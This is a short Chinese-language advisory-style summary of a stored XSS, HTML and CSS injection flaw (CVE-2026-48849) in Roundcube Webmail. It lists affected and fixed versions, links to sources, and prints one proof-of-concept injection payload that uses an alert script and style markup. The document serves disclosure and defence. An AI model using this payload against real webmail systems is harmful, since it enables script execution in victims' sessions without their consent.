| 字段 | 值 |
|---|
| CVE | CVE-2026-48849 |
| 产品 | Roundcube Webmail |
| 漏洞类型 | 存储型XSS / HTML注入 / CSS注入 |
| 受影响版本 | 1.6.x 版本低于 1.6.16,1.7.x 版本低于 1.7.1 |
| 修复版本 | 1.6.16, 1.7.1 |
| 发现/报告者 | Anand Jogawade (zazy) |
成功利用可能导致:
该漏洞的一个显著特点是:有效载荷会在用户登录后的会话恢复过程中自动执行,无需额外用户交互。
'"><script>alert("XSS")</script> <h1>HTML</h1><h2>Injection</h2> <b/style=position:fixed;top:0;left:0;font-size:200px>CSS Injection<!--




Roundcube 安全公告
https://roundcube.net/news/2026/05/24/security-updates-1.6.16-and-1.7.1
Roundcube 1.6.16 发布
https://github.com/roundcube/roundcubemail/releases/tag/1.6.16
Roundcube 1.7.1 发布
https://github.com/roundcube/roundcubemail/releases/tag/1.7.1
Roundcube 变更日志
https://github.com/roundcube/roundcubemail/blob/master/CHANGELOG.md
SentinelOne CVE 条目
https://www.sentinelone.com/vulnerability-database/cve-2026-48849/
此概念验证仅用于教育、研究和防御性安全目的。测试应仅在你拥有或已获授权评估的系统上进行。